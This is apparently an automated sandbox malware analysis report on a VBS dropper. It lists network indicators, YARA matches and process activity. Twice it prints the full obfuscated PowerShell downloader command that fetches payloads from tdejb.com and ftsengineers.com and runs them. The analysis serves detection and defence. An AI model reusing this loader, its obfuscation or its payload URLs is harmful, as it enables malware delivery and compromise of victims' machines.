                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49738 -> 202.71.109.228:443
                        Source: global trafficHTTP traffic detected: GET /kp/Epilachna.qxd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.tdejb.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /ab/ab.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.tdejb.comCache-Control: no-cache
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_05B6B055 memset,memset,WSARecv,GetLastError,WSAGetLastError,WSAGetLastError,WSAGetLastError,RegisterWaitForSingleObject,11_2_05B6B055
                        Source: global trafficHTTP traffic detected: GET /kp/Epilachna.qxd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.tdejb.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /ab/ab.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.tdejb.comCache-Control: no-cache
                        Source: global trafficDNS traffic detected: DNS query: www.tdejb.com
                        Source: msiexec.exe, 0000000A.00000003.2178558767.0000000000667000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2178501643.000000000062E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2203558932.000000000062E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2178435166.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                        Source: wscript.exe, 00000000.00000002.1774255669.000001CE97EDC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1773528398.000001CE97EDC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1772993678.000001CE97ECF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                        Source: wscript.exe, 00000000.00000002.1774255669.000001CE97EDC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1773528398.000001CE97EDC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1772993678.000001CE97ECF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                        Source: wscript.exe, 00000000.00000003.1741652492.000001CE97F51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1741505742.000001CE97F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?0c3741d782f58
                        Source: wscript.exe, 00000000.00000003.1741652492.000001CE97F51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1741505742.000001CE97F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?0c3741d782
                        Source: powershell.exe, 00000003.00000002.1980105016.0000016E76FF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2113268820.0000000005E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 00000008.00000002.2088551763.0000000004F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2085867731.00000000033D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000003.00000002.1952454378.0000016E66F81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2088551763.0000000004E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000003.00000002.1952454378.0000016E68BED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tdejb.com
                        Source: powershell.exe, 00000008.00000002.2088551763.0000000004F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2085867731.00000000033D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000003.00000002.1952454378.0000016E68BED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tdejb.com
                        Source: powershell.exe, 00000003.00000002.1952454378.0000016E66F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000008.00000002.2088551763.0000000004E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                        Source: svchost.exeString found in binary or memory: https://cloudflare-dns.com/dns-query
                        Source: powershell.exe, 00000008.00000002.2113268820.0000000005E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000008.00000002.2113268820.0000000005E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000008.00000002.2113268820.0000000005E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 00000008.00000002.2088551763.0000000004F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2085867731.00000000033D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000003.00000002.1952454378.0000016E67B48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: powershell.exe, 00000003.00000002.1980105016.0000016E76FF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2113268820.0000000005E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 00000003.00000002.1952454378.0000016E671A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1952454378.0000016E6848A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2088551763.0000000004F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ftsengineers.com/km/Epilachna.qxd
                        Source: powershell.exe, 00000003.00000002.1952454378.0000016E671A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1952454378.0000016E68B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com
                        Source: msiexec.exe, 0000000A.00000002.2203269463.00000000005BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/ab/ab.bin
                        Source: msiexec.exe, 0000000A.00000002.2203269463.00000000005BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/ab/ab.bin.Tg
                        Source: msiexec.exe, 0000000A.00000002.2203269463.00000000005BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/ab/ab.bineT
                        Source: msiexec.exe, 0000000A.00000002.2203269463.00000000005BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/ab/ab.bini
                        Source: powershell.exe, 00000003.00000002.1952454378.0000016E671A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1952454378.0000016E6848A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2088551763.0000000004F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/kp/Epilachna.qxd
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.4:49738 version: TLS 1.2
                        Source: msiexec.exe, 0000000A.00000003.2195588250.0000000021650000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_24215ad2-3
                        Source: msiexec.exe, 0000000A.00000003.2195588250.0000000021650000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_53184757-2
                        Source: Yara matchFile source: 10.3.msiexec.exe.21870000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.svchost.exe.5830000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.3.msiexec.exe.21650000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.svchost.exe.5a50000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.3.msiexec.exe.21650000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.3.msiexec.exe.21870000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.3.msiexec.exe.21650000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.svchost.exe.5a50000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000A.00000003.2195588250.0000000021650000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2199773661.0000000005A50000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2195813778.0000000021870000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2199606583.0000000005830000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5948, type: MEMORYSTR

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: amsi32_4948.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 5752, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 4948, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Wscript starts Powershell (via cmd or directly)
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='Dogernes';;$Eksplosionsmotorernes47=$host.Name; function Resubmerging($Dagsproduktionernestjeneste){If ($Eksplosionsmotorernes47) {$Satirizers='Flippermaskiners';$Heterogenes=2;$Dagsproduktionerne=$Heterogenes}do{$laboratorieplanlgningers+=$Dagsproduktionernestjeneste[$Dagsproduktionerne];$Dagsproduktionerne+=3} until(!$Dagsproduktionernestjeneste[$Dagsproduktionerne])$laboratorieplanlgningers}function Impalement($Lucern179){ .($Raaderet113) ($Lucern179)}$Aabningshaand=Resubmerging 'Sun,reSlTSy. rw';$Aabningshaand+=Resubmerging 'BeE.lBSyCSpLKai CeShn t';$Stikkelsbrbens127=Resubmerging 'FoMAmoEtzOriFyl Pl DaRe/';$Telemetered=Resubmerging 'AtT SlGus s1 I2';$Dagsproduktionernendows='Pl[AcnP EOrtEu.Nos ae,mrUavS,iS c pEMaPS o yiDon DtB M a cn.jaMaGUnEJerlo]Ca: :SkS eeTacBlU urPiiBit AYBep ORInoM TEloTaCFao.nl B=Sc$IntMie LReeTemKuEViTP.eUdrLiEK D';$Stikkelsbrbens127+=Resubmerging 'S 5 r.,a0Sn Pe(F W MiannArdDioVswRes BeNApTA Pl1 r0Ra. e0Li; o CrWJeiUnnDi6Ne4Fo;fo PixRe6F 4R ; D F rBuv h:Lk1Hi3 T1 u.Ep0 H) S StG EeRac.ekBuo T/ 2 G0Op1 .0Fe0Sc1 O0Sq1Ne BlF Pi UrFoe fAnoAlxFr/,r1 .3B,1.i. S0';$Centas=Resubmerging ',oU s SE CrSc- Ma g deHyN UT';$morbidise=Resubmerging 'Ovh ntU tTipTrsDr:Ra/Ou/ ,w Sw NwFi. ttC dUne BjDibta.Kic so .m v/SukPopEl/HaE kpPei.il ea rc lhCrnSwa.t. ,qMuxEfdPu>.ah Pt Bttrprns a:Co/Sv/ Lw dwK.wS . fUdt AsG ePrnGigT iMon leMeeHorV sCa. BcUfoBrm T/KakScmWo/ OENepAuiJalHaaRicfihHonLeaAk.OlqMux Cd';$Dixenite=Resubmerging 'Sc>';$Raaderet113=Resubmerging ' ,I ePaX';$Feminologisk='Bestrr';$klerum='\Enspndervognes.Eks';Impalement (Resubmerging ' K$ sgN lIno bgiAPrl C:UnrA a ,bOvAD lGedRveRerReMTed RE.e=O,$ le ,N FV C: BAScp .pQudLraFoTprASk+b.$SpKFeLU E nRLauSeM');Impalement (Resubmerging ' S$ GC.lKoO pbUcAS lO,:DiGLaAilsMatVaR OO gm ,E nNvitoAVi=Ta$FoMO oEurUrb BIRedSpi Ssane p.PrsInP el PiSktKo( d$b d FI oXInE enC IGgTUdEUn)');Impalement (Resubmerging $Dagsproduktionernendows);$morbidise=$gastromenia[0];$Parfumens=(Resubmerging 'Lr$moG KlBiO ebUgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y BiDdntig p.TrHaneUnaS.dH e Rr usIm[ D$ SC .e SnUntM,a.es G]I,=Bl$prSTotPaiPikvikN,e UlTrsEkbArrSvb ieCun s A1Ud2 a7');$Nonappreciative=Resubmerging 'Im$KaDPie .cFia .lIncGui,nf .yUkiAsn g.d. SD o.lwEunSulUno RaP dUlFC iInlEfeTi(Ty$ ,m EovarKabEniBrdCaisasileFl,Fr$S.S ooJak TlT e.ptAnt feUnnAn7K,6 O)';$Sokletten76=$Rabaldermde;Impalement (Resubmerging ',e$T gliL vOMaB BAAplUm: S ,T vOReS ,NTuI.xN.uG e rnL,s e=.a(PaTSneL.SsttTr-GePUra,eTCoHE D $KySMaO Hk .LIbEd tChT SEV,nra7Re6Va)');while (!$Stosningens) {Impalement (Resubmerging 'Mu$EpgShl
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='Dogernes';;$Eksplosionsmotorernes47=$host.Name; function Resubmerging($Dagsproduktionernestjeneste){If ($Eksplosionsmotorernes47) {$Satirizers='Flippermaskiners';$Heterogenes=2;$Dagsproduktionerne=$Heterogenes}do{$laboratorieplanlgningers+=$Dagsproduktionernestjeneste[$Dagsproduktionerne];$Dagsproduktionerne+=3} until(!$Dagsproduktionernestjeneste[$Dagsproduktionerne])$laboratorieplanlgningers}function Impalement($Lucern179){ .($Raaderet113) ($Lucern179)}$Aabningshaand=Resubmerging 'Sun,reSlTSy. rw';$Aabningshaand+=Resubmerging 'BeE.lBSyCSpLKai CeShn t';$Stikkelsbrbens127=Resubmerging 'FoMAmoEtzOriFyl Pl DaRe/';$Telemetered=Resubmerging 'AtT SlGus s1 I2';$Dagsproduktionernendows='Pl[AcnP EOrtEu.Nos ae,mrUavS,iS c pEMaPS o yiDon DtB M a cn.jaMaGUnEJerlo]Ca: :SkS eeTacBlU urPiiBit AYBep ORInoM TEloTaCFao.nl B=Sc$IntMie LReeTemKuEViTP.eUdrLiEK D';$Stikkelsbrbens127+=Resubmerging 'S 5 r.,a0Sn Pe(F W MiannArdDioVswRes BeNApTA Pl1 r0Ra. e0Li; o CrWJeiUnnDi6Ne4Fo;fo PixRe6F 4R ; D F rBuv h:Lk1Hi3 T1 u.Ep0 H) S StG EeRac.ekBuo T/ 2 G0Op1 .0Fe0Sc1 O0Sq1Ne BlF Pi UrFoe fAnoAlxFr/,r1 .3B,1.i. S0';$Centas=Resubmerging ',oU s SE CrSc- Ma g deHyN UT';$morbidise=Resubmerging 'Ovh ntU tTipTrsDr:Ra/Ou/ ,w Sw NwFi. ttC dUne BjDibta.Kic so .m v/SukPopEl/HaE kpPei.il ea rc lhCrnSwa.t. ,qMuxEfdPu>.ah Pt Bttrprns a:Co/Sv/ Lw dwK.wS . fUdt AsG ePrnGigT iMon leMeeHorV sCa. BcUfoBrm T/KakScmWo/ OENepAuiJalHaaRicfihHonLeaAk.OlqMux Cd';$Dixenite=Resubmerging 'Sc>';$Raaderet113=Resubmerging ' ,I ePaX';$Feminologisk='Bestrr';$klerum='\Enspndervognes.Eks';Impalement (Resubmerging ' K$ sgN lIno bgiAPrl C:UnrA a ,bOvAD lGedRveRerReMTed RE.e=O,$ le ,N FV C: BAScp .pQudLraFoTprASk+b.$SpKFeLU E nRLauSeM');Impalement (Resubmerging ' S$ GC.lKoO pbUcAS lO,:DiGLaAilsMatVaR OO gm ,E nNvitoAVi=Ta$FoMO oEurUrb BIRedSpi Ssane p.PrsInP el PiSktKo( d$b d FI oXInE enC IGgTUdEUn)');Impalement (Resubmerging $Dagsproduktionernendows);$morbidise=$gastromenia[0];$Parfumens=(Resubmerging 'Lr$moG KlBiO ebUgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y BiDdntig p.TrHaneUnaS.dH e Rr usIm[ D$ SC .e SnUntM,a.es G]I,=Bl$prSTotPaiPikvikN,e UlTrsEkbArrSvb ieCun s A1Ud2 a7');$Nonappreciative=Resubmerging 'Im$KaDPie .cFia .lIncGui,nf .yUkiAsn g.d. SD o.lwEunSulUno RaP dUlFC iInlEfeTi(Ty$ ,m EovarKabEniBrdCaisasileFl,Fr$S.S ooJak TlT e.ptAnt feUnnAn7K,6 O)';$Sokletten76=$Rabaldermde;Impalement (Resubmerging ',e$T gliL vOMaB BAAplUm: S ,T vOReS ,NTuI.xN.uG e rnL,s e=.a(PaTSneL.SsttTr-GePUra,eTCoHE D $KySMaO Hk .LIbEd tChT SEV,nra7Re6Va)');while (!$Stosningens) {Impalement (Resubmerging 'Mu$EpgShlJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B9EAB263_2_00007FFD9B9EAB26
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B9EB8D23_2_00007FFD9B9EB8D2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAB87A53_2_00007FFD9BAB87A5
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BABA4DA3_2_00007FFD9BABA4DA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAB9CCA3_2_00007FFD9BAB9CCA
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04D6E9288_2_04D6E928
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04D6F1F88_2_04D6F1F8
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04D6E5E08_2_04D6E5E0
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_05B7D5A911_2_05B7D5A9
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_05B694D011_2_05B694D0
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_05B7FC0211_2_05B7FC02
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_05B7CF7E11_2_05B7CF7E
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_05B7866011_2_05B78660
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_05B7318B11_2_05B7318B
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_05B789ED11_2_05B789ED
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_05B691CA11_2_05B691CA
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_05B8104C11_2_05B8104C
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_05B7DB4511_2_05B7DB45
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_05B7D22911_2_05B7D229
                        Source: 0iTxQouy7k.vbsInitial sample: Strings found which are bigger than 50
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4468
                        Source: unknownProcess created: Commandline size = 4468
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4468Jump to behavior
                        Source: amsi32_4948.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 5752, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 4948, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: msiexec.exe, 0000000A.00000003.2192684520.000000000066A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .a_po^ ojYd.o B U.R G v.Q_F& ZNH K.9.sV`OQ qOq_A( N5.j P.X z.k.Yf_HL.P.L`.C Ue_q_B_t.h{_yr\=A f.3_q_Fvb_H_bm W.UP#.by_iY.Yw I.Y_G p.3c g.Zy S v.U.N C_m Z_i.H_j B l_DH_Pd.iz_O.f~ U z_Mv_d7 T Mz.f.594/}_m kS.v.D u.rZu.S G.N_x.V J.Q.G FO^.X<.6_fv.V ny.L,_E.2.m I_l.b$ Mx sZ.K! p.Y.U.V:U.89 R_H F3.d_R A UQ.C_y y Y Jb.Q_S.N.s< l_Ab~[_w9zV?!C9.N_HQ)*_n R.tP Ww_u aU;.V EPk Xr.Q0.y.A!]_b!7 g.R_pF.E_b o.o.q.o_E.T_rdfw.c}_ck.4.Y_w:_P.B(#`_xy_i.3_Y.A_N.q.6.YE_S_T.R H n.R_d_F.V.s_R68).I aL q.H b.W.Q!.r b_w c c$_va.X_v.tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_C_Q.e J q7E V P.LP_Q.kTN_c.F.D gc.hT_s_Q1
                        Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@13/9@1/2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Enspndervognes.EksJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3568:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_03
                        Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4b44c99e-e2eb-c0a4be-89a68ae4061c}
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cpu3fn4w.zsa.ps1Jump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0iTxQouy7k.vbs"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5752
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4948
                        Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: 0iTxQouy7k.vbsVirustotal: Detection: 16%
                        Source: 0iTxQouy7k.vbsReversingLabs: Detection: 28%
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0iTxQouy7k.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumber
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
